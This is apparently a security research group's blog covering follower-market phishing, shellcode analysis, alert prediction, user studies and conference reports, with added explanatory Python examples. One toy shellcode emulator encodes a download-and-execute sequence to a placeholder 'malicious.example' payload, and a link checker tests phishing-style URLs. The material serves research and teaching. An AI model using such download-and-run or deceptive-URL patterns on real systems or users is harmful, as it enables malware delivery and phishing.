Poultry Markets: On the Underground Economy of Twitter Followers

Twitter has become such an important medium that companies and celebrities use it extensively to reach their customers and their fans. Nowadays, creating a large and engaged network of followers can make the difference between success and failure in marketing. However, creating such a network requires time, especially when the party building it does not have an established reputation among the public.

For this reason, a number of websites that help Twitter users build a large network of followers have emerged. These websites promise to provide their subscribers with followers in exchange for a fee. In addition, some of these services offer to spread promotional messages across the network. We call this phenomenon Twitter Account Markets. We study it in our paper “Poultry Markets: On the Underground Economy of Twitter Followers”, which will appear at the SIGCOMM Workshop on Online Social Networks (WOSN) later this year.

Typically, the services offered by a Twitter Account Market are accessible through a web page. Customers can buy followers at a rate of between $20 and $100 per 1,000 followers. In addition, markets typically offer the possibility of having content sent out by a certain number of accounts, again in exchange for a fee.

All the Twitter Account Markets we analyzed offer both “free” and “premium” versions of their services. While premium customers pay for the service, free ones gain followers by giving away their Twitter credentials (a clever form of phishing). Once the market administrator has the credentials for an account, he can use it to follow other Twitter accounts (the free or premium customers of the market) or to send out “promoted” content (typically spam). For convenience, the market administrator typically authorizes an OAuth application using his victim’s stolen credentials; this lets him administer a large number of accounts easily through the Twitter API.

Twitter Account Markets are a big problem on Twitter: first, an account with an inflated number of followers tends to look more trustworthy to other social network users. Second, these services introduce spam into the network.

Of course, Twitter does not like this behavior. In fact, it has introduced a clause in its Terms of Service that specifically forbids participating in Twitter Account Market operations. Twitter periodically suspends the OAuth applications used by Twitter Account Markets. However, since the market administrator holds the credentials of his victims’ accounts, he can simply authorize a new application and continue his operation.

In our paper, we propose techniques to detect both Twitter Account Market victims and customers. We believe that an effective way of mitigating this problem would be to focus on the customers rather than on the victims. Since participating in a Twitter Account Market violates the Terms of Service, Twitter could suspend such accounts and hurt the market on the economic side.
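The mechanism described above leaves a structural trace: because the market administrator uses the same pool of victim accounts to follow each new customer, victims end up following the same customers at nearly the same time. The following is an added illustration, not the paper's detection method or code: a toy "lockstep following" detector over a constructed list of follow events. Account names, timestamps and the thresholds (`window`, `min_targets`) are all assumptions made for the example.

```python
"""Lockstep-following detector (added illustration; not the paper's method).

A Twitter Account Market uses the stolen credentials of its "free" victims
to follow its paying customers, so the same set of victim accounts ends up
following the same customers within a short time.  This toy flags pairs of
follower accounts whose follow actions co-occur on many targets inside a
time window.  All data below is constructed for the example.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from itertools import combinations

# Constructed follow events: (follower, followed account, ISO timestamp)
FOLLOW_EVENTS = [
    ("victim_a", "customer_1", "2012-03-01T10:00:00"),
    ("victim_b", "customer_1", "2012-03-01T10:00:05"),
    ("victim_c", "customer_1", "2012-03-01T10:00:09"),
    ("victim_a", "customer_2", "2012-03-01T11:30:00"),
    ("victim_b", "customer_2", "2012-03-01T11:30:03"),
    ("victim_c", "customer_2", "2012-03-01T11:30:07"),
    ("victim_a", "customer_3", "2012-03-02T09:00:00"),
    ("victim_b", "customer_3", "2012-03-02T09:00:02"),
    ("victim_c", "customer_3", "2012-03-02T09:00:04"),
    # organic behaviour: scattered follows at unrelated times
    ("alice", "customer_1", "2012-03-01T15:00:00"),
    ("alice", "news_org", "2012-03-03T08:00:00"),
    ("bob", "news_org", "2012-03-05T20:00:00"),
    ("victim_a", "news_org", "2012-03-04T12:00:00"),
]


def parse(events):
    """Turn the raw tuples into (follower, target, datetime)."""
    return [(f, t, datetime.fromisoformat(ts)) for f, t, ts in events]


def lockstep_pairs(events, window=timedelta(minutes=5), min_targets=3):
    """Return {(follower_x, follower_y): set_of_targets} for follower pairs
    that followed at least `min_targets` distinct accounts within `window`
    of each other.  Thresholds are assumptions for this example."""
    by_target = defaultdict(list)
    for follower, target, ts in parse(events):
        by_target[target].append((ts, follower))
    shared = defaultdict(set)
    for target, entries in by_target.items():
        entries.sort()
        for (t1, f1), (t2, f2) in combinations(entries, 2):
            if f1 != f2 and abs(t2 - t1) <= window:
                shared[tuple(sorted((f1, f2)))].add(target)
    return {pair: targets for pair, targets in shared.items()
            if len(targets) >= min_targets}


def suspected_victims(events, **kw):
    """Accounts whose follow actions move in lockstep with another account."""
    accounts = set()
    for pair in lockstep_pairs(events, **kw):
        accounts.update(pair)
    return accounts


def suspected_customers(events, **kw):
    """Accounts that received lockstep follows (the market's paying side)."""
    targets = set()
    for t in lockstep_pairs(events, **kw).values():
        targets |= t
    return targets


if __name__ == "__main__":
    print("suspected victims:", sorted(suspected_victims(FOLLOW_EVENTS)))
    print("suspected customers:", sorted(suspected_customers(FOLLOW_EVENTS)))
```

On the constructed data the three victim accounts are flagged for following `customer_1`, `customer_2` and `customer_3` within seconds of each other, while `alice` and `bob`, whose follows are scattered in time, are not. A real deployment would need the public follow graph with timestamps and a threshold tuned against organic "follow back" behaviour; the point here is only that the customer side of the market is observable from the victims' synchronized actions.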

Posted in Social Networks

Shellzer: a tool for the dynamic analysis of malicious shellcode

Last September, I presented Shellzer at the RAID 2011 conference. Shellzer is a tool I developed back in August 2010 that aims to dynamically analyze malicious shellcode. The main goal was to analyze the shellcode samples collected by running Wepawet over the years. Given the size of our dataset (about 30,000 shellcode samples at that time), an automated approach was clearly needed.

After trying several approaches and tools, I came across PyDbg, a Python Win32 debugging abstraction class. Using it, I started to write my own tool to dynamically analyze a given shellcode. My very first attempt consisted of single-stepping through the whole shellcode binary. This gave complete control over the sample’s execution, which, the shellcode being a malicious piece of code, was an ideal feature. Unfortunately, this approach is not feasible in practice. In fact, the number of assembly instructions that have to be executed at run time is in the order of millions, even though shellcode is commonly only a few hundred bytes long. This is because many loops are present, and some of them are executed thousands of times. Moreover, the shellcode invokes Windows API functions. These two factors cause a huge overhead for an approach based on single-stepping, and the analysis consequently lasted several minutes on average.

My research focused on finding how to avoid single-stepping the whole shellcode execution while maintaining complete control over it. This proved challenging, due to the many evasion techniques used by these pieces of code. If you are interested in the details, please read the paper. The output of the analysis currently consists of a detailed trace of the Windows API functions called (with their parameters and return values), the Windows DLLs that have been loaded, and the list of URLs contacted by the shellcode. Furthermore, Shellzer supports the analysis of shellcode samples extracted from malicious PDF documents, in addition to those detected in web-based drive-by-download attacks.
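To make the single-stepping cost concrete, here is an added toy example; it is not Shellzer's code and does not use PyDbg. A tiny register machine stands in for x86, a constructed "shellcode" program runs a decoder-style loop a couple of thousand times and then calls stand-in Windows APIs, and two tracers are compared: one invoked on every executed instruction (single-stepping) and one invoked only when an API is entered (a breakpoint on the API). Both produce the same Shellzer-style report (API trace with parameters and return values, DLLs loaded, URLs contacted); only the number of debugger events differs. The instruction set, the fake API return values and the URL are assumptions made for the example.

```python
"""Toy illustration of single-stepping versus API-entry breakpoints.

Added example, not Shellzer's code.  A tiny register machine stands in for
x86: a constructed "shellcode" decodes a buffer in a loop (thousands of
iterations, as real decoder stubs do) and then calls stand-in Windows APIs.
Two tracers yield the same API report; the single-step tracer fires once per
executed instruction, the breakpoint tracer only on API calls.
"""

# Constructed program: (opcode, operands).  Jump targets are instruction indexes.
SHELLCODE = [
    ("mov", "ecx", 2000),                 # 0: loop counter (decoder iterations)
    ("mov", "eax", 0),                    # 1
    ("xor", "eax", 0x41),                 # 2: "decode one byte"
    ("dec", "ecx"),                       # 3
    ("jnz", "ecx", 2),                    # 4: loop back while ecx != 0
    ("call", "LoadLibraryA", ("urlmon.dll",)),
    ("call", "URLDownloadToFileA",
     (0, "http://malicious.example/payload.exe", "C:\\tmp\\a.exe", 0, 0)),
    ("call", "WinExec", ("C:\\tmp\\a.exe", 0)),
    ("halt",),
]

# Stand-in API implementations with constructed, plausible return values.
FAKE_API_RESULTS = {"LoadLibraryA": 0x7C800000, "URLDownloadToFileA": 0, "WinExec": 33}


def run(program, tracer, mode):
    """Execute `program`.  mode == "single-step": tracer(pc, insn) on every
    instruction.  mode == "breakpoint": tracer only at API calls.
    Returns (report, number_of_tracer_invocations)."""
    regs = {"eax": 0, "ecx": 0}
    report = {"api_trace": [], "dlls": [], "urls": []}
    pc, events = 0, 0
    while True:
        insn = program[pc]
        op = insn[0]
        if mode == "single-step":
            tracer(pc, insn)
            events += 1
        if op == "halt":
            break
        if op == "mov":
            regs[insn[1]] = insn[2]
        elif op == "xor":
            regs[insn[1]] ^= insn[2]
        elif op == "dec":
            regs[insn[1]] -= 1
        elif op == "jnz":
            if regs[insn[1]] != 0:
                pc = insn[2]
                continue
        elif op == "call":
            name, args = insn[1], insn[2]
            if mode == "breakpoint":
                tracer(pc, insn)          # breakpoint hit on API entry
                events += 1
            ret = FAKE_API_RESULTS[name]
            report["api_trace"].append((name, args, ret))
            if name == "LoadLibraryA":
                report["dlls"].append(args[0])
            report["urls"].extend(a for a in args
                                  if isinstance(a, str) and a.startswith("http"))
        pc += 1
    return report, events


def compare(program=SHELLCODE):
    """Run both strategies and show they agree on the report but not on cost."""
    silent = lambda pc, insn: None
    ss_report, ss_events = run(program, silent, "single-step")
    bp_report, bp_events = run(program, silent, "breakpoint")
    assert ss_report == bp_report        # identical analysis output
    return {"single_step_events": ss_events,
            "breakpoint_events": bp_events,
            "report": bp_report}


if __name__ == "__main__":
    result = compare()
    print("single-step events:", result["single_step_events"])
    print("breakpoint events:", result["breakpoint_events"])
    for name, args, ret in result["report"]["api_trace"]:
        print(f"{name}{args} -> {ret:#x}")
    print("DLLs:", result["report"]["dlls"], "URLs:", result["report"]["urls"])
```

With a 2,000-iteration loop the single-step tracer fires 6,006 times while the breakpoint tracer fires 3 times, for an identical report; a real decoder loop of hundreds of thousands of iterations makes the gap the post describes. What the toy does not show is the hard part of the paper: shellcode that detects the debugger or resolves API addresses itself, which is why the breakpoints cannot simply be placed on known entry points.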

Since November 2011, this tool has been used by Wepawet. When a shellcode is detected, it is automatically forwarded to the shellcode analyzer and Shellzer’s report is included in the main Wepawet report. Read this post for more details. Naturally, the tool is not perfect and some samples cannot be analyzed yet. If, after submitting a sample to Wepawet, a shellcode is detected and you don’t see the additional shellcode information, it means that something went wrong. Please don’t hesitate to contact us in case of errors: we need your feedback!

Posted in Binary Analysis, Web Security

Report from SecurityZone 2011 – The 1st International Security Conference in Colombia (Cali)

Last month I was invited to Cali’s SecurityZone, the 1st International Security Conference of Colombia. Edgar Rojas, CEO of The MuRo Group, brought together 16 well-known and strong international security experts for 2+1 days of conference in DEFCON/BlackHat style. Among them, strong personalities such as Ian Amit, Chris John Riley, Stefan Friedli and Chris Nickerson animated the event, talking about cyberwar attacks, compliance, red team testing and threat modeling.

The numbers alone document the success of this first security event in Colombia: the conference hosted more than 450 attendees from all over Colombia and from the UK, USA, Venezuela, Brazil, Argentina and Mexico, and over 2,400 people were connected via streaming.

But SecurityZone’s success is not only a matter of numbers: among the many conferences I have attended recently, SecurityZone has certainly been one of the best for its people. The organizers did an excellent job in putting this event together. I won’t forget their cordiality, kindness, and friendly, always smiling attitude. At the same time, our attendees were hungry for knowledge, always asking for information and photos :-)

I am now looking forward to SecurityZone 2012; in the meanwhile, follow us on Twitter!

Posted in Conferences

About Nexat paper in ACSAC 2011

Last week, our group attended ACSAC 2011. The conference was held at the Buena Vista Palace in Orlando, Florida. I presented the Nexat paper, and the feedback was encouraging.

Nexat was a research project in collaboration with Casey Cipriano and Amir Houmansadr. Nexat tries to solve a problem that a typical security administrator faces nowadays. Security administrators are normally overwhelmed by the amount of security alerts their monitoring tools generate. They also cannot keep up with the stream of events and predict the next security-related events. Therefore, administrators are usually reactive.

The reason for this problem is that the security battlefield is not even: a simple button press by an attacker may cause thousands of alerts to be generated on the administrator’s side. Nexat tries to even the field by deducing relationships between different sets of alerts. Nexat is able to detect related alerts (alerts that may be part of the same attack) and uses them to predict the next step of the attack. This way, Nexat lets administrators be one step ahead of the attackers. Nexat does not require a priori knowledge about attacks, which makes it able to detect and predict new types of attack as long as they are composed of detectable steps. For our evaluation, we used the alerts generated by Snort during iCTF 2008.
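The idea of learning alert relationships from the stream itself, with no attack knowledge built in, can be shown on a small scale. The following is an added illustration and is not Nexat's algorithm or code: it parses a few constructed Snort-style alert lines, groups alerts into sessions by source and destination address, counts which signature follows which inside the sessions seen so far, and uses those counts to predict the next signature for sessions that are still in progress. The alert format, addresses and signature names are constructed for the example; the session key and the first-order transition model are assumptions, and a real system would need time windows, multi-step context and alert de-duplication.

```python
"""Alert correlation and next-step prediction (added illustration).

Not Nexat's algorithm: this toy groups alerts from the same (src, dst) pair
into sessions, learns which alert signature tends to follow which from the
sessions seen so far, and uses those counts to predict the next signature.
No attack knowledge is built in; everything is learned from the stream.
The Snort-style alert lines below are constructed for the example.
"""
import re
from collections import Counter, defaultdict

ALERTS = """\
03/02-10:00:01.000 [**] ICMP PING NMAP [**] 10.0.0.5 -> 10.0.1.2
03/02-10:00:03.000 [**] SCAN nmap TCP [**] 10.0.0.5 -> 10.0.1.2
03/02-10:00:09.000 [**] WEB-MISC /etc/passwd [**] 10.0.0.5 -> 10.0.1.2
03/02-10:00:15.000 [**] SHELLCODE x86 NOOP [**] 10.0.0.5 -> 10.0.1.2
03/02-10:05:01.000 [**] ICMP PING NMAP [**] 10.0.0.9 -> 10.0.1.3
03/02-10:05:02.000 [**] SCAN nmap TCP [**] 10.0.0.9 -> 10.0.1.3
03/02-10:05:07.000 [**] WEB-MISC /etc/passwd [**] 10.0.0.9 -> 10.0.1.3
03/02-10:05:20.000 [**] SHELLCODE x86 NOOP [**] 10.0.0.9 -> 10.0.1.3
03/02-10:09:00.000 [**] ICMP PING NMAP [**] 10.0.0.7 -> 10.0.1.4
03/02-10:09:04.000 [**] SCAN nmap TCP [**] 10.0.0.7 -> 10.0.1.4
"""

# timestamp [**] signature [**] src -> dst   (constructed layout)
LINE_RE = re.compile(r"^(\S+) \[\*\*\] (.+?) \[\*\*\] (\S+) -> (\S+)$")


def parse_alerts(text):
    """Parse alert lines into dicts; lines that do not match are skipped."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            out.append({"ts": m.group(1), "sig": m.group(2),
                        "src": m.group(3), "dst": m.group(4)})
    return out


def sessions(alerts):
    """Group alerts into candidate attack sessions keyed by (src, dst).
    Input order is preserved, so each value is the signature sequence."""
    groups = defaultdict(list)
    for a in alerts:
        groups[(a["src"], a["dst"])].append(a["sig"])
    return groups


def learn_transitions(sessions_by_key):
    """counts[current_sig][next_sig] = how often next_sig followed current_sig."""
    counts = defaultdict(Counter)
    for sigs in sessions_by_key.values():
        for cur, nxt in zip(sigs, sigs[1:]):
            counts[cur][nxt] += 1
    return counts


def predict_next(counts, current_sig):
    """Most likely next signature after current_sig and its empirical probability."""
    followers = counts.get(current_sig)
    if not followers:
        return None, 0.0
    sig, n = followers.most_common(1)[0]
    return sig, n / sum(followers.values())


def predict_open_sessions(text):
    """For every session, predict the step after its last observed alert."""
    sess = sessions(parse_alerts(text))
    counts = learn_transitions(sess)
    predictions = {}
    for key, sigs in sess.items():
        nxt, p = predict_next(counts, sigs[-1])
        if nxt:
            predictions[key] = (nxt, round(p, 2))
    return predictions


if __name__ == "__main__":
    for (src, dst), (sig, p) in predict_open_sessions(ALERTS).items():
        print(f"{src} -> {dst}: next expected alert '{sig}' (p={p})")
```

Two complete sessions teach the model that a scan is followed by a web probe and then by shellcode; the third session, which has only reached the scan, is predicted to produce `WEB-MISC /etc/passwd` next, so the administrator can act on that host before the alert arrives.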

Posted in Systems Security

Insights into User Behavior in Dealing with Internet Attacks

We have finally finished analyzing the data from the user experiments we conducted earlier this year, and collected the results in the paper “Insights into User Behavior in Dealing with Internet Attacks”, which will appear at NDSS in February 2012.

Many Internet attacks have a strong human aspect; they require some sort of user interaction, such as clicking on a malicious link. In order to understand how users cope with these attacks, and how they judge the security implications of the actions they take, we built an online security test platform and conducted experiments with over 160 Internet users, with diverse backgrounds and technical sophistication. We presented the participants with concrete security scenarios exemplifying prevalent attacks such as XSS, link manipulation tricks and file sharing scams, and observed their decisions.

To very briefly summarize some of our interesting findings:

  • Non-technical users largely failed to recognize threats, and assess the consequences of their actions. Interestingly, they were still able to avert relatively simple attacks solely based on their intuition, and frequent exposure to similar situations in the past.
  • Many users treated the ‘length’ of URLs as a sign of maliciousness. They avoided long and complicated URLs claiming those look suspicious, but followed shorter (but malicious!) links. Analogously, users often made misinformed decisions based on the ‘size’ of files.
  • Non-technical users were mostly unaware of how shortened URLs (e.g., TinyURL) work; none of them reported knowing how to check the real link destinations.
  • Trick banners commonly found in file sharing sites had a high success rate of tricking the participants, even those who were tech-savvy.
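The second and third findings point at something a practitioner can act on: the visible length of a URL says nothing about where it leads, and the destination of a shortened link is not visible at all. The following is an added illustration, not from the paper or its test platform: a small helper that extracts the host a browser would actually contact and reports the two link-manipulation tricks that the length heuristic misses (a `user@host` prefix that puts a trusted name before the real host, and a trusted name used as a leading subdomain label), plus whether the host is a well-known shortener. The host names in the test inputs are constructed placeholders; the two-label "registered domain" rule and the shortener list are simplifying assumptions (a real checker would use the public suffix list).

```python
"""Show a user where a link really goes (added illustration, not from the paper).

Users in the study judged links by their length and did not know how to find
a shortened link's real destination.  This helper extracts the host a browser
would actually contact, flags the userinfo trick
(http://trusted.example@attacker.example/) and the subdomain trick
(trusted.example.attacker.example), and recognises well-known shortener
hosts so the caller knows the visible URL is not the final destination.
"""
from urllib.parse import urlsplit

# Well-known URL shorteners; the list is an assumption for the example.
SHORTENER_HOSTS = {"tinyurl.com", "bit.ly", "t.co", "goo.gl"}


def registered_domain(host):
    """Last two labels, e.g. 'www.example.com' -> 'example.com'.
    Simplification: the public suffix list would be needed for 'co.uk' etc."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def inspect_link(url):
    """Return the effective host, its registered domain and a list of findings."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    reg = registered_domain(host)
    findings = []
    if parts.username is not None:
        # Everything before '@' is userinfo, not the site; the browser goes to `host`.
        findings.append(f"userinfo '{parts.username}' precedes the real host {host}")
    if host.count(".") >= 3:
        # More than one label in front of the registered domain: a trusted name
        # placed there is still just a subdomain of `reg`.
        findings.append(f"host is a deep subdomain of {reg}; leading labels are not the site")
    if host in SHORTENER_HOSTS:
        findings.append("shortened link: the real destination is only known after a redirect")
    return {"host": host, "registered_domain": reg,
            "findings": findings, "url_length": len(url)}


if __name__ == "__main__":
    for u in ("https://www.example.com/a/very/long/path?with=many&parameters=1",
              "http://paypal.com@evil.example/",
              "http://secure.paypal.com.account-verify.example/login",
              "http://tinyurl.com/abc"):
        r = inspect_link(u)
        print(f"{u}\n  length={r['url_length']} site={r['registered_domain']}")
        for f in r["findings"]:
            print("  !", f)
```

Run as a script, the long but harmless URL produces no findings while the three short ones each produce one, which is exactly the inversion of the intuition the participants relied on.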

I would like to encourage you to read the paper if you are interested in the details of the tests and our analysis and discussion of the results. I would also like to thank everyone who participated in our tests!

Posted in Web Security

Report from RAID 2011

A few weeks ago we attended the 14th Recent Advances in Intrusion Detection (RAID) Symposium in Menlo Park, California. The conference was held at SRI International and featured 20 talks about malware, application security, anomaly detection and network security.

Our group presented three papers: Yanick talked about Shellzer, a tool for the dynamic analysis of malicious shellcode, which will soon be integrated with Wepawet. Bob presented Dymo, a system that provides a dynamic code identity primitive, which tracks the run-time integrity of a process and can also produce labels for network packets to distinguish between legitimate and malicious network activity.

I talked about Disarm, which I developed together with Paolo and Clemens for my Master’s degree at the Vienna University of Technology. As operators of the dynamic malware analysis sandbox Anubis, we are very interested in detecting environment-sensitive malware that is capable of fingerprinting Anubis and evading the analysis. Disarm therefore automates the screening of malware samples for evasive behavior, and it helped us discover several evasion techniques used by malware against Anubis (and also against other dynamic analysis sandboxes).

I was pleased with the positive feedback and interest in our work and thoroughly enjoyed the conference, especially meeting colleagues from UCSB and the Institute Eurécom and other experts from the security community.

Posted in Conferences

Report from the USENIX Security Symposium 2011

Last week we attended the 20th USENIX Security Symposium in San Francisco. Taking advantage of the high availability of travel grants and of the fact that the conference was close to Santa Barbara, we packed a minivan with people and drove up north.

As a group, we presented two papers at the conference. I gave my talk on BotMagnifier, about which I have already blogged in the past. The paper was well received by the audience, and I was asked many questions, some of which will help improve the system in future work. The other paper our group presented was JACKSTRAWS: Picking Command and Control Connections from Bot Traffic. Gregoire presented this paper, which is a collaboration between UCSB and our colleagues at Ruhr University Bochum. In this paper they presented Jackstraws, a system that is able to identify C&C connections and, by using machine learning techniques, builds models of such connections, with the goal of matching the behavior of unknown bots against those models.

The level of the conference was really good, and we attended several interesting talks. Manos Antonakakis presented a system for detecting domains used by malware by looking at the upper DNS hierarchy. This approach is very similar to the EXPOSURE system developed by our group, but operates at a higher level. Another interesting talk was given by Chris Grier. They infiltrated 4 large pay-per-install services and studied the dynamics and the market behind malware droppers. I also enjoyed the talk by Edward Schwartz, who presented Q, a system that automatically builds ROP payloads for vulnerable binaries. However, a problem with this paper is that, while it does a good job of showing how existing defenses can be bypassed using ROP, it is not as successful in discussing the efforts made by the research community to fight such attacks. For example, the paper “G-Free: Defeating Return-Oriented Programming through Gadget-less Binaries”, which our group published last year and which provides a defense against ROP, is not even mentioned in their related work discussion.

Posted in Conferences